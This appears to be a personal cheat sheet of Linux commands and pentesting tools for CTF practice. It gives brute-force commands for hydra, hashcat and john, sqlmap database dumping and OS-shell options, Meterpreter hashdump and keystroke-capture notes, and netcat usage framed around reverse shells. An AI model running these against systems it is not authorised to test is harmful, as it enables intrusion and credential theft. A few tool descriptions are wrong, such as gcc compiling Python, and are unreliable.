Find the full Path to our current working directory
Chmod allows you to set the different permissions for a file
Example:
chmod 777 file.txt
Permissions
Digit | Meaning |
---|---|
1 | That file can be executed |
2 | That file can be written to |
3 | That file can be executed and written to |
4 | That file can be read |
5 | That file can be read and executed |
6 | That file can be written to and read |
7 | That file can be read, written to, and executed |
To make a binary file just executable for the owner of the file, you can use:
chmod u+x file.txt
Change the user and group for any file
Syntax:
chown user:group file
change user/group
Example (change the owner):
chown berkan file.txt
-R
to operate on every file in the directory at once
The curl command transfers data to or from a network server, using one of the supported protocols (HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, DICT, TELNET, LDAP or FILE).
Syntax:
curl <URL>
simply fetches the URL and prints it to the terminal.
Options:
-s
to suppress the output (statistics)
-#
show progress bar
-o page.html <URL>
to save the output to a file
-O <URL>
to save the output to a file with the same name as the file in the URL
-I <URL>
to get the headers only
-L <URL>
to follow redirects
-b <NAME1=VALUE1;NAME2=VALUE2>
specify cookies
-d <data> <URL>
to send data
-X <METHOD> <URL>
to change the request method
-T <FILE> <URL>
to upload a file
-u <USER>:<PASSWORD>
to authenticate
-A <AGENT> <URL>
to change the user agent
--referer <URL_REF> <URL>
to change the referer
-H <HEADER> <URL>
to add headers
-H "DNT: 1" <URL>
to change the DNT(do not track) header
-H "X-Forwarded-For: <IP>" <URL>
to change the X-Forwarded-For header
-H "Accept-Language: da-DK" <URL>
to change the Accept-Language header (ex. Danish)
-H "Date: Mon, 23 11 2018 23:23:23 GMT" <URL>
to change the date
Example:
Real use case example
# Download a file
curl -O http://example.com/file.txt
# Advanced curl command to get the flag
curl -s -A "PicoBrowser" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" --referer http://mercury.picoctf.net:36622 http://mercury.picoctf.net:36622/ | grep -oI "picoCTF{.*}"`
The wget command downloads files from HTTP, HTTPS, or FTP connection a network.
Get ftp files recursively
wget -r ftp://ftpuser:<USER>@<IP>
Options:
-O
to specify the output file
-b
to run in the background
-r
to download recursively
-q
to download in quiet mode
Wash is a tool that can be used to crack WPA/WPA2 handshakes. It is a part of the aircrack-ng suite.
Example usage:
wash -i wlan0mon
- to scan for WPA/WPA2 networks
Netdiscover is a tool that can be used to scan for live hosts on a network. It is a part of the aircrack-ng suite.
Example usage:
netdiscover -i wlan0mon
or netdiscover -r <ip>/24
- to scan for live hosts on a network
Netstat is a command-line utility that displays network connections for TCP (both incoming and outgoing)
Example usage:
netstat -tulpn
- to display all active listening ports
ss is a command-line utility that displays network connections for TCP, UDP, Unix sockets, and more. (modern)
Example usage:
ss -tulpn
- to display all active listening ports
tcpdump is a command-line utility that allows you to capture and analyze network traffic going through your system
Example usage:
tcpdump -i wlan0mon
- to capture all network traffic on the wlan0mon interface
Whatweb is a handy tool and contains much functionality to automate web application enumeration across a network. We can extract the version of web servers, supporting frameworks, and applications using the command-line tool.
Example usage:
whatweb --no-errors 10.10.10.0/24
Options:
-a=LEVEL
Aggresion level
-U=AGENT
User agent
--header
HTTP header
--max-redirects=NUM
Maximum number of redirects
-u=<user:password>
Basic authentication
-c=COOKIES
Use cookies
--cookie-jar=FILE
Read cookies from a file
-g=STRING|REGEXP
Search for a string
--no-errors
Suppress error messages
-p=LIST
List all plugins
-l
List all plugins
-v
Verbose mode
-q
Quiet output
-h
to show help (highly recommended)
apt is a command-line utility for installing, updating, removing, and otherwise managing deb packages
sudo apt update
This will pull the latest changes from the APT repositories:
sudo apt upgrade
To upgrade the installed packages to their latest versions
sudo apt full-upgrade
The difference between upgrade and full-upgrade is that the later will remove the installed packages if that is needed to upgrade the whole system.
sudo apt install package_name
Install packages
sudo apt remove package_name
Remove packages
sudo apt autoremove
Remove unused packages
sudo apt list
List packages
dig command stands for Domain Information Groper. It is used for retrieving information about DNS name servers
dig [server] [name] [type]
dig google.com
Options:
-x
Specify IP adress
+noall +answer
Detailed information
Save to a file:
dig -f domain_research.txt +short
tar is a command that allows creating, maintaining, modifying, and extracting files that are archived in the tar format (tar, gzip, zip).
The most common example for tar extraction would be:
tar -xf archive.tar
Compressing files with tar
tar -czvf stuff.tar.gz
Uncompressing files with tar
tar -xvzf myfolder.tar.gz -C myfolder/
Options:
-c
tells tar to create an archive.
-z
tells tar to compress the archive with gzip.
-v
tells tar to be verbose.
-f
tells tar that the next argument will be the name of the archive to operate on.
-C
tells tar to change to the directory specified before performing any operations.
-x
tells tar to extract files from an archive.
gzip - a file format and a software application used for file compression and decompression. gzip-compressed files have .gz extension.
gzip filename.txt
compression
Switches:
-d
decompression
Example:
gzip -d file.gz
7z is a file archiver with a high compression ratio.
Example usage:
7z a <Zip folder> <Files or *> -p<SECRET>
Search the contents of files for specific values
grep "hello world" file.txt
Search for an ip using regular expressions
grep -Eo '[0–9]{1,3}\.[0–9]{1,3}\.[0–9]{1,3}\.[0–9]{1,3}'
Search for binaries (ex. "/usr/bin/sudo")
grep '^/.../.../....$'
Grep for CTF flag 1/2
grep -oi '\S*flag\S*' <path>
Grep for CTF flag 2/2
grep "flag{.*}"
Options
-n
line numbers for every string found
-E
regular expressions
-R
recursive grep
-i
case insensitive
Word count
wc -l file.txt
get numbers of entries
Options
-l
count number of lines
-c
count number of bytes
-w
count number of words
-m
count number of characters
Cut parts of lines from specified files or piped data and print the result to standard output.
Syntax
cut OPTION FILE
Example usage
/etc/passwd | cut -d":" -f1
Options
-f
- Select by specifying a field, a set of fields, or a range of fields. This is the most commonly used option.
-c
- Select by specifying a character, a set of characters, or a range of characters.
-d
- Specify a delimiter that will be used instead of the default “TAB” delimiter.
Another possibility to replace certain characters from a line with characters defined by us is the tool tr
Example usage
Change delimeter from ":" to " " (space).
tr ":" " "
Change from lowercase to uppercase
tr 'a-z' 'A-Z
Options
-d
delete characters
-s
squeeze characters
Since such results can often have an unclear representation, the tool column is well suited to display such results in tabular form using the "-t
"
Example usage:
column -t
Awk is a utility that enables a programmer to write tiny but effective programs in the form of statement
Syntax
awk [flags] [select pattern/find(sort)/commands] [input file]
Example usage
Print the first and second field of a file
awk '{print $1, $2}
Print number of lines
awk '{print NR, $0}
Options
-F
field separator (without 'Begin')
-v
variable assignment
-o
output file
$0
: Represents the entire line of text.
$1
: Represents the first field.
$2
: Represents the second field.
$7
: Represents the seventh field.
$45
: Represents the 45th field.
$NF
: Stands for “number of fields,” and represents the last field.
$NR
: Number the lines
$FS
: Field separator
$RS
: Record separator
$OFS
: Output field separator
$ORS
: Output record separator
/<pattern>/
: Represents a pattern to match.
Advanced examples
# Split on space
awk -F: '{RS=" "} {print $1}'
# Print the first and third field of the /etc/passwd file
awk -F: '{print $1, $3}' /etc/passwd
# Print the first and third field of a file, split on "o" and print the total number of rows
awk 'BEGIN {FS="o"} {print $1,$3} END{print "Total Rows=",NR}'
# Print the first and fourth field of file and print as "Name:ID"
awk 'BEGIN {FS=" "; OFS=":"} {print $1,$4}' file.txt
ippsec:34024
john:50024
thecybermentor:25923
liveoverflow:45345
nahamsec:12365
stok:1234
# Print the first field of a file and separate with a comma
awk 'BEGIN {ORS=","} {print $1}' file.txt
ippsec,john,thecybermentor,liveoverflow,nahamsec,stok
Example usage
Replace the word "bin" with "BK."
sed 's/bin/BK/g'
Format trailing space with a colon
sed 's/ */:/g' file.txt
Only get alphanumeric values
sed 's/[[:digit:]]//g' file.txt
The "s" flag at the beginning stands for the substitute command. Then we specify the pattern we want to replace. After the slash (/), we enter the pattern we want to use as a replacement in the third position. Finally, we use the "g" flag, which stands for replacing all matches.
Find out what user we're currently logged in as
Prints basic information about the operating system name and system hardware
uname -a
will print all available information
FTP or File Transfer Protocol is a network communication protocol that enables two computers to communicate
Standard use
ftp <IP>
Enter your username and password to log in to the server. Some FTP servers allow anonymous logins with a username and password of "anonymous
".
Commands:
ls
- list files
cd
- change directory
get
- download file
put
- upload file
quit
- exit
See more commands here.
SSH or Secure Shell is a network communication protocol that enables two computers to communicate
Standard use
ssh user@ip
and type the password
Login with a key
ssh -i path_to_pem user@ip
Specify other ports than 22
ssh user@ip -p <port>
Create an SSH tunnel
ssh -D 8080 -C -q -N user@ip # Create a tunnel
chromium --no-sandbox --proxy-server="socks5://localhost:8080" # Use the tunnel
SCP or Secure Copy Protocol is a network communication protocol that enables two computers to communicate and transfer files between them using the SSH protocol.
Copy a file to a remote server
scp /path/to/file user@ip:/path/to/remote/file
Copy a file from a remote server to a local server
scp user@ip:/path/to/remote/file /path/to/file
Example (file to a remote server ):
scp example.txt [email protected]:/home/berkan/
Searchsploit is a command line search tool for the offline version of Exploit-DB
Usage:
searchsploit [options] term1 term2 term3 ...
Example:
searchsploit afd windows local
Options:
-c, --case [Term]
- Perform a case-sensitive search (Default is inSEnsITiVe)
-e, --exact [Term]
- Perform an EXACT search (e.g. "WordPress 4.1" would not detect "WordPress Core 4.1")
-s, --strict
- Perform a strict search, so input values must exist("1.1" would not be detected in "1.0 < 1.3")
-t, --title [Term]
- Search JUST the exploit title (Default is title AND the file's path
-p, --path [EDB-ID]
- Show the full path to an exploit
-w, --www
- Show URLs to Exploit-DB.com rather than the local path
--exclude="term"
Remove values from results. By using "|" to separate, you can chain multiple values e.g. --exclude="term1|term2|term3”
xfreerdp is an X11 Remote Desktop Protocol (RDP) client
Usage:
xfreerdp [options] server[:port] [[options] server[:port] ...]
Options:
/u:<username>
- Username
/p:<password>
- Password
/v:<hostname>:<port>
- Server hostname
/cert:ignore
- Ignore certificate
/ipv6
, /6
- Prefer IPv6 AAA record over IPv4 A record
Read and modify hex of a file (This tool is also helpful when it comes to CTFs and text is hidden inside a file or when the magic number of a file was altered.) Alternatives are: xxd, hexedit, GHex (GNOME GUI) & HxD (Windows).
Example usage
hexeditor -n file.txt
Options
-a
Print all text characters.
-n
Force Gray scale, no colors.
Controls:
CTRL + F - Go to last line
CTRL + C - Exit without saving
CTRL + X - Exit and save
CTRL + U - Undo
CTRL + W - Search
Binwalk allows users to analyze and extract firmware images and helps in identifying code, files, and other information embedded in those, or inside another file
Usage:
binwalk [options] <file>
Examples:
binwalk -e firmware.bin
- Extract files
binwalk -Me firmware.bin
- Recursively scan extracted files (matryoshka)
binwalk -e firmware.bin
- Extract files
-e
- Extract files
-M
- Recursively scan extracted files (matryoshka)
-v
- Verbose output
-q
- Quiet output
Sudo is Linux's 'run as administrator' command
Options
-u <user>
specify user
su
change to root
-l
list current sudo priviliges
Hashid will analyze and output the potential algorithm that is used to hash your input. Supports over 250 hash types.
hashid option hash
-e
- list all possible hash algorithms including salted passwords
-m
- include corresponding hashcat mode in output
-j
- include corresponding JohnTheRipper format in output
-o FILE
- write output to file (default: STDOUT)
-h
- show help message and exit
Hash-identifier will analyze and output the potential algorithm that is used to hash your input. I would say that it is a better alternative to hashid. Supports over 100 hash types.
Usage:
hash-identifier hash
Example:
hash-identifier 5d7845ac6ee7cfffafc5fe5f35cf666d
Haiti is another great tool to identify a hash type. It also returns the format that can be used with john the ripper and hashcat to crack the hash. Supports over 500 hash types.
Installation:
gem install haiti-hash
Usage:
haiti hash
Example:
haiti 5d7845ac6ee7cfffafc5fe5f35cf666d
Find SHA1 hash for a file
sha1sum file.txt
Find MD5 hash for a file
md5sum file.txt
Decrypt base64
base64 -d file.txt
Gpg encrypt a file
gpg -c data.txt
Enter keyphrase
Decrypt the file
gpg -d data.txt.gpg
Enter keyphrase
hexdump is used to filter and display the specified files, or standard input in a human readable specified format.
Syntax
hd {options} {files}
Options
-c
One-byte character display.
-C
Canonical hex + ASCII display.
xxd is a hex editor that can be used to convert binary files to hex and vice versa.
Syntax
xxd [options] [infile [outfile]]
Example
Hexdump to binary and then to plain text
xxd -r -p file.txt
Options
-b
binary digit dump
-p
plain hex dump (continuous string)
-e
little-endian dump
-l <LEN>
stop after octets.
-r
hex dump to binary (plain text)
-d
show offset in decimal instead of hex.
-u
use upper case hex letters.
-i
output in C include file style.
-s
start at offset.
objdump is a command-line utility that displays information about one or more object files. It can be used to disassemble object files, executable files, shared libraries, and core dumps.
Syntax
objdump [options] [file]
Example
Dump the contents of a file
objdump -d file
Get the return address
objdump -d file | grep ret
Is a command-line application for reading, writing and editing meta information in a wide variety of files.
Install with:
sudo apt install libimage-exiftool-perl
Usage
exiftool file.jpeg
Is a password cracker that runs on .zip files
Install
sudo apt-get install fcrackzip
Usage
fcrackzip -vbDp <wordlist path> <filepath>
Example
fcrackzip -Dp /usr/share/wordlists/rockyou.txt secret.zip -v
Options
-b
for using brute force algorithms.
-D
for using a dictionary.
-v
for verbose mode.
-p
for using a string as a password.
-u
for unzipping.
Neofetch displays information about your operating system, software and hardware in an aesthetic and visually pleasing way.
Install
sudo apt install neofetch
or see here.
Usage
neofetch
Crunch is a wordlist generator that can generate all possible combinations and permutations.
Install
sudo apt-get install crunch
Usage
crunch <min> <max> <characters>
Example
crunch 8 8 abcdefghijklmnopqrstuvwxyz -t @@dog@@@-o wordlist.txt
Options
-t
for adding a pattern to the generated wordlist.
-o
for saving the generated wordlist to a file.
Cewl is a tool that spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. See more here.
Install
sudo apt-get install cewl
Usage
cewl <url> -w <output file>
Options
-w
for saving the generated wordlist to a file.-d
for setting the depth of the spider.-m
for setting the minimum word length.-x
for setting the maximum number of words to return.
rax2 comes in handy when there is a need to make base conversions between hexadecimal representations, floating point values, hex-pair strings to ASCII, binary, octal, integer and so on.
Syntax
rax2 <options> <value>
Example
rax2 -s 0x424b
A list of most useful flags:
-a show ascii table ; rax2 -a
-b bin -> str ; rax2 -b 01000010 01001011 # BK
-B str -> bin ; rax2 -B hello # 0110100001100101011011000110110001101111
-d force integer ; rax2 -d 3 -> 3 instead of 0x3
-D base64 decode ; rax2 -D SGVsbG8gd29ybGQ= # Hello world
-E base64 encode ; rax2 -E Hello world # SGVsbG8gd29ybGQ=
-f floating point ; rax2 -f 6.3+2.1
-I IP address <-> LONG ; rax2 -I 3530468537 # 185.172.110.210
-k keep base ; rax2 -k 33+3 -> 36
-K randomart ; rax2 -K 0x34 1020304050
-L bin -> hex(bignum) ; rax2 -L 111111111 # 0x1ff
-n binary number ; rax2 -n 0x1234 # 34120000
-o octalstr -> raw ; rax2 -o \162 \62 # r2
-N binary number ; rax2 -N 0x1234 # \x34\x12\x00\x00
-r multiple outputs ; rax2 -r 0x1234
-s hexstr -> raw ; rax2 -s 42 4b # BK
-S raw -> hexstr ; rax2 -S < /bin/ls > ls.hex
-t tstamp -> str ; rax2 -t 1234567890 # Sat Feb 14 00:31:30 2009
-x hash string ; rax2 -x linux #0x5ca62a43
-u units ; rax2 -u 389289238 # 317.0M
-w signed word ; rax2 -w 16 0xffff
jq is a lightweight and flexible command-line JSON processor. It is used to parse, filter, and transform JSON data. It is written in C and has no external dependencies.
To install use sudo apt install jq
Syntax
jq <options> <filter> <input>
Example
jq . sample.json
one way of prettifying json data
cat sample.json | jq
another way of prettifying json data
jq -c < pretty.json
minify json data
gcc is a compiler that can be used to compile C as well as Python code to an executable file.
Syntax:
gcc <options> <input>
Example:
gcc hello.c -o hello
Compile the program
./hello
Run the compiled program
The syntax for both of these commands are adduser username
and addgroup groupname
.
Add a user to a group
usermod -a -G <groups seperated by commas> <user>
>
is the operator for output redirection. Meaning that you can redirect the output of any command to a file
>>
does mainly the same thing as >, with one key difference. >> appends the output of a command to a file, instead of erasing it.
A file descriptor (FD) in Unix/Linux operating systems is an indicator of connection maintained by the kernel to perform Input/Output (I/O) operations. In Windows-based operating systems, it is called filehandle. It is the connection (generally to a file) from the Operating system to perform I/O operations (Input/Output of Bytes). By default, the first three file descriptors in Linux are:
Data Stream for Input
STDIN – 0
Data Stream for Output
STDOUT – 1
Data Stream for Output that relates to an error occurring.
STDERR – 2
Redirects the file descriptors for the errors (STDERR) to "/dev/null
" This way, we redirect the resulting errors to the "null device," which discards all data.
find /etc/ -name shadow 2>/dev/null > results.txt
Redirect STDOUT and STDERR to Separate Files
find /etc/ -name shadow 2> stderr.txt 1> stdout.txt
Aircrack-ng - is a complete suite of tools to assess WiFi network security
TO BE ADDED
https://cheatography.com/itnetsec/cheat-sheets/aircrack-ng-suite/
Gobuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names
gobuster -w wordlist.txt
Standard scan
gobuster dir -u http://172.162.39.86 -w /usr/share/wordlists/dirb/megalist.txt
DNS subdomain enumeration
gobuster dns -d http://172.162.39.86 -w /usr/share/SecLists/Discovery/DNS/namelist.txt
dir
Directory/file brute forcing mode
dns
DNS bruteforcing mode
-u
(url) – full target URL (including scheme), or base domain name.
-w
(wordlist) – path to the wordlist used for brute forcing (use – for stdin).
-a
(user agent string) – specify a user agent string to send in the request header.
-e
(print) - Print the full URLs in your console
-o
(file) – specify a file name to write the output to.
-x
(extensions) – list of extensions to check for, if any.
-P
(password) – HTTP Authorization password (Basic Auth only, prompted if missing).
-U
(username) – HTTP Authorization username (Basic Auth only).
-c <http cookies>
(cookie) - Specify a cookie for simulating your auth
-s
(status-codes) - Set status codes that should be interpreted as valid
-k
(ssl) - Skip ssl certificate
-H
(HTTP) - Specify HTTP header
-t
(threads) - Number of concurrent threads (default: 10)
-v
(verbose) - Verbose output
-q
(quiet) - Quiet output
-n
(no-redirect) - Do not follow redirects
-r
(recursive) - Recursively brute force subdirectories
Find a list of seclists here.
feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories.
Syntax:
feroxbuster [OPTIONS]
Example:
feroxbuster -u https://berkankutuk.dk -w /usr/share/wordlists/dirb/big.txt
Options:
-h, --help
- Print help information
-V, --version
- Print version information
-u, --url <URL>
- The target URL
-b, --cookies <COOKIE>
- Specify HTTP cookies to be used in each request
-m, --methods <HTTP_METHODS>
- Which HTTP request method(s) should be sent (default: GET)
-x, --extensions <FILE_EXTENSION>
- File extension(s) to search for (ex: -x php -x pdf js)
-C, --filter-status <STATUS_CODE>
- Filter out status codes (deny list) (ex: -C 200 -C 401)
-s, --status-codes <STATUS_CODE>
- Filter status codes (allow list) (default: 200 204 301 302 307 308 401 403 405)
-r, --redirects
- Allow client to follow redirects
-T, --timeout <SECONDS>
- Number of seconds before a client's request times out (default: 7)
-d, --depth <RECURSION_DEPTH>
- Maximum recursion depth, a depth of 0 is infinite recursion (default: 4)
-e, --extract-links
- Extract links from response body and make new requests based on findings
-L, --scan-limit <SCAN_LIMIT>
- Limit total number of concurrent scans (default: 0, i.e. no limit)
-n, --no-recursion
- Do not scan recursively
-t, --threads <THREADS>
- Number of concurrent threads (default: 50)
--time-limit <TIME_SPEC>
- Limit total run time of all scans (ex: --time-limit 10m)
-w, --wordlist <FILE>
- Path to the wordlist
-o, --output <FILE>
- Output file to write results
-v, --verbosity
- Increase verbosity level (use -vv or more for greater effect. '4' -v's is probably too much)
Hashcat is a particularly fast, efficient, and versatile hacking tool that assists brute-force attacks by conducting them with hash values of passwords that the tool is guessing or applying. See Cheatsheet.
Learn How to brute-force passwords using GPU and CPU in Linux.
Convert WPA/WPA2 handshake from a pcap file to a modern hashcat compatible hash file.
hashcat -m <number> <hash_file> <dict_file>
Dictionary
hashcat -m 1800 -a 0 hashed.txt /usr/share/wordlists/rockyou.txt -o output.txt
Bruteforce
hashcat -m 0 -a 3 -i hashed.txt ?a?a?a?a?a?a?a -o output.txt
-m
sets the mode
-a
sets the attack mode (0=Straight,1=Combination,3=Bruteforce,6=Hybrid:wlist+mask,7=Hybrid:mask+wlist)
-o
output to filename
-r
sets rules
--status
keep screen updated
--runtime
abort after X seconds
--force
sets workload to insane (This can lead to false positives)
-i
increment (bruteforce)
0=Straight
1=Combination
3=Bruteforce
6=Hybrid:wlist+mask
7=Hybrid:mask+wlist
?l
Lowercase a-z
?u
Uppercase A-Z
?d
Decimals
?h
Hex using lowercase chars
?H
Hex using uppercase chars
?s
Special chars
?a
All (l,u,d,s)
?b
Binary
Hydra is a tool used to brute-force username and password to different services such as ftp, ssh, telnet, MS-SQL, etc.
hydra -options path
Guess SSH credentials using a given username and a list of passwords:
hydra -l username -P path/to/wordlist.txt host_ip -t 4 ssh -V
Guess Telnet credentials using a list of usernames and a single password, specifying a non-standard port and IPv6:
hydra -L path/to/usernames.txt -p password -s port -6 host_ip telnet
Guess FTP credentials using usernames and passwords lists, specifying the number of threads:
hydra -L path/to/usernames.txt -P path/to/wordlist.txt -t n_threads host_ip ftp
Guess MySQL credentials using a username and a passwords list, exiting when a username/password pair is found:
hydra -l username -P path/to/wordlist.txt -f host_ip mysql
Web form credentials:
hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip_adress> http-post-form "/login:username=^USER^&password=^PASS^:F=Username or password invalid" -V
Guess IMAP credentials on a range of hosts using a list of colon-separated username/password pairs:
hydra -C path/to/username_password_pairs.txt imap://[host_range_cidr]
Guess POP3 credentials on a list of hosts using usernames and passwords lists, exiting when a username/password pair is found:
hydra -L path/to/usernames.txt -P path/to/wordlist.txt -M path/to/hosts.txt -F pop3
-S
connect via SSL
-f
specify host
-s
specify a port
-l
single username
-L
wordlist username(s)
-p
single password
-P
wordlist password(s)
-o
FILE write found login/password pairs to FILE instead of stdout
-V
verbose mode, see output for every attempt
-I
ignore the resume dialog
-t <number>
specifies the number of threads to use
-u
by default Hydra checks all passwords for one login and then tries the next login. This option loops around the passwords, so the first password is tried on all logins, then the next password.
John The Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, and other. Cheatsheet
john <hash_file> --wordlist=<wordlist>
Cracking MD5 hashes
john --format=raw_md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Crack hashed private key
python /usr/share/john/ssh2john.py id_rsa > hash.txt
ssh2john.py can sometimes also be located under /opt/john/ssh2john.py
Crack the hash (or a shadow file)
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
See more about JTR.
Crack a zip file using zip2john
First, convert the zip file to a hash
zip2john file.zip > zip.hash
Then crack the hash
john zip.hash
The Metasploit Framework is a powerful tool for penetration testing, exploit development, and vulnerability research, offering modules for information gathering, scanning, exploitation, and post-exploitation.
- Auxiliary: Supports modules like scanners, crawlers, and fuzzers.
- Encoders: Encode exploits and payloads to evade signature-based antivirus detection.
- Payloads:
- Singles: Self-contained payloads (e.g., add user, open app) that run without additional downloads.
- Stagers: Establish connection channels between Metasploit and the target, facilitating the download of staged payloads.
- Stages: Larger payloads downloaded by stagers to expand functionality.
Single payloads use an underscore (e.g., generic/shell_reverse_tcp
), while staged payloads use a slash (e.g., windows/x64/shell/reverse_tcp
).
Initialize the database
msfdb init
View advanced options for starting the console
msfconsole -h
Start metasploit
msfconsole
Check db connection
db_status
Msf commands
help
or ?
- shows the help page
Search exploit
search <exploit_for>
Select module
use <module>
Change value of a variable
set <variablename> <value>
get <variablename>
unset <variablename>
Save msfconsole session
save
Save console outputs
spool
See privileges of a current user
getprivs
Tranfer files to victim computer
upload
Check if the victim pc is in a VM (Windows)
run post/windows/gather/checkvm
See what a machine could be vulnerable to
run post/multi/recon/local_exploit_suggester
Spawn a normal system shell
shell
Meterpreter is a Metasploit payload that runs in memory on the target system without installation, avoiding detection by antivirus, IDS, and IPS. It communicates with Metasploit via encrypted channels but can still be detected by some antivirus programs.
- Post-exploitation: Allows further data gathering, privilege escalation, and lateral movement.
- Migrate: Move to another process (e.g.,
word.exe
) to interact with it or capture keystrokes. Usemigrate <PID>
.-
You may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver).
-
- Hashdump: Dumps the SAM database of Windows to retrieve NTLM password hashes for cracking or Pass-the-Hash attacks. One example of this is ntlm.pw.
- Search: Use
search -f <filename>
to locate files with sensitive data. - Shell: Launches a standard command-line shell on the target. Use
CTRL+Z
to return to Meterpreter.
These features make Meterpreter a powerful tool for post-exploitation activities.
See some of the available commands here.
Netcat aka nc is an extremely versatile tool. It allows users to connect to specific ports and send and receive data. It also allows machines to receive data and connections on specific ports, which makes nc a very popular tool to gain a Reverse Shell.
Computer B (acts as the receiving server):
nc -lvnp 6790 > testfile.txt
Computer A (acts as the sending client):
nc [IP address of computer B] 6790 < testfile.txt
Chat Server example
# Computer A
nc -lvp 1337
# Computer B
nc -v <ip_pc_a> 1337
-l
Listen to connections (TCP)
-v
Enable verbose mode (allows you to see who connected to you)
-p
Specify a port to listen to
-e
Specify program to execute after connecting to a host
-u
Connect to UDP ports
-n
Fast scan by disabling DNS resolution
-w
Define timeout value
-4
IPv4 only
-6
IPv6 only
>
Server file redirection
<
Client file redirection
Nikto 2 or nikto is a popular web scanning tool that allows users to find common web vulnerabilities. It is commonly used to check for common CVE's such as shellshock, and to get general information about the web server that you're enumerating.
nikto -h <ip> -port <port>
-h
Hostname/IP adress
-port
Specify ports
-nossl
Disable ssl
-ssl
Force ssl
-id
Specify authentication(username & password)
-plugin
Select which plugin to use
-update
Update the plugin list
--list-plugins
List all possible plugins to use
-output
Output fingerprinted information to a file
Nmap is a utility for network discovery and security auditing.
Note, there is now a better and much faster alternative to nmap called rustscan. See more about it here.
nmap [options] [ip]
Example:
nmap -sT -T4 -A -p- 172.162.39.86
TCP scan (Most likely to be filtered)= -sT
TCP Syn Scan (No logging)= -sS
UDP scan (Slow)= -sU
ICMP Scanning (host discovery, no port scans) = -sn
Default ping scanning) = -sP
Detect OS = -O
Detect version of services = -sV
Scan with the default nmap scripts = -sC
Disable host discovery and just scan for open ports = -Pn
ARP Scan (only on same subnet as target) = -PR
Change verbosity = -v
Change verbosity level two = -vv
(It's good practice to always increase the verbosity in your scans.)
Save nmap results in three major formats = -oA [filename] [target]
Save nmap results in a text file = -oN [filename] [target]
Save nmap results in grepable format = -oG [filename] [target]
Aggresive mode (Enable OS detection, version detection, script scanning, and traceroute) = -A
Timing leves (Speed of scans, can make errors) = -T<Level>
(0-5)
Port scan (specific)= -p <port>
Port scan (range) = -p <from>-<to>
Port scan (all) = -p-
Activate a script= —-script=<script_name>
Decoy an ip adress, learn more = -D
Fast mode = -F
Only open ports = --open
List of hosts to scan = -iL
No DNS lookup = -n
Reverse DNS lookup = -R
Scan an IPv6 address = -6
Subnet mask with 255.255.255.0 = <ip>/24
RustScan is a fast and extensible port scanner written in Rust. See more.
rustscan -a 127.0.0.1 -p 53,80,121,65535
Options
-a
A list of comma separated CIDRs, IPs, or hosts to be scanned
-b <size>
Batch size for parallel scanning (default 4500)
-p <port1>,<port2>
A list of commaseperated ports.
-r <range>
Specify range of ports (ex. 1-1000)
--scripts <script>
Run scripts
-t <timeout>
Timeout in milliseconds to consider port closed (default 1500)
--tries <tries>
Number of tries to consider port closed (default 1)
-q
Quiet mode.
Note: RustScan, at the moment, runs Nmap by default. So you can also specify commsnds like
-sC
and-A
.
SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap <option> <url>
-u
- URL to test for SQL injection
-g
- Google Dork to test for SQL injection
-p
- Parameter to test for SQL injection
-D
- Dump a specific database to enumerate
-T
- Dump a specific table to enumerate
-C
- Dump specific columns to enumerate
--level
- Level of tests to perform (1-5)
--dbms
- Force SQLMap to use a specific DBMS
--dump
- Dump the contents of the database
--dump-all
- Dump all databases
--os-shell
- Get an OS shell
--batch
- Automatic run, won't ask for user input
--tables
- Dump all tables
--columns
- Dump all columns
--threads
- Number of threads to use
--level
- Level of tests to perform (1-5 def: 1)
--risk
- Risk of tests to perform (1-3 def: 1)
--dbs
- List databases
--technique
- Specify a technique to use
(B: Boolean-based blind, E: Error-based, U: Union-based, S: Stacked queries, T: Time-based blind)
SQLMap to try and bypass the WAF by using --tamper=space2comment
Test for SQL injection.
sqlmap.py -u <website> --dbs
Dumping some data inside columns from a table in a database. List tables in a database.
sqlmap.py -u <website> -D <database_name> --tables
List columns in a table in a database.
sqlmap.py -u <website> -D <database_name> -T <table_name> --columns
Dump data from columns in a table in a database.
sqlmap.py -u <website> -D <database_name> -T <table_name> -C <column_name1>,<column_name2> -dump
TO BE ADDED
Burp Suite, a framework of web application pentesting tools, is widely regarded as the de facto tool to use when performing web app testing
Download Burp Suite here.
Burp Suite requires Java JRE in order to run. Download and install Java here.
We need to install a CA certificate as BurpSuite acts as a proxy between your browser and sending it through the internet - It allows the BurpSuite Application to read and send on HTTPS data.
- Download Foxy Proxy in order to fully leverage the proxy, we'll have to install the CA certificate included with Burp Suite (otherwise we won't be able to load anything with SSL).
- Now click on the extension -> Options -> Add -> Fill in the fields with the following values:
- Title = Burp
- Proxy type = HTTP
- Proxy IP adress or DNS name =
127.0.0.1
- Port =
8080
- Username and password is optional.
- And hit save.
- Finally, click on the FoxyProxy extension icon again and select 'Burp'.
- With Firefox, navigate to the following address:
http://localhost:8080
- Click on 'CA Certificate' in the top right to download and save the CA Certificate.
- Now that we've downloaded the CA Certificate, move over to the settings menu in Firefox. Search for 'Certificates' in the search bar.
- Click on 'View Certificates'. Next, in the Authorities tab click on 'Import' and then OK.
- Proxy - Burp Proxy allows us to intercept and modify requests/responses when interacting with web applications.
- Target - How we set the scope of our project. We can also use this to effectively create a site map of the application we are testing.
- Intruder - Incredibly powerful tool for everything from field fuzzing to credential stuffing and more
- Repeater - Allows us to capture, modify, then resend the same request numerous times. This feature can be absolutely invaluable, especially when we need to craft a payload through trial and error (e.g. in an SQLi -- Structured Query Language Injection) or when testing the functionality of an endpoint for flaws.
- Sequencer - Analyzes the 'randomness' present in parts of the web app which are intended to be unpredictable. This is commonly used for testing session cookies.
- Decoder - As the name suggests, Decoder is a tool that allows us to perform various transforms on pieces of data. These transforms vary from decoding/encoding to various bases or URL encoding.
- Comparer - Comparer as you might have guessed is a tool we can use to compare different responses or other pieces of data such as site maps or proxy histories (awesome for access control issue testing). This is very similar to the Linux tool diff.
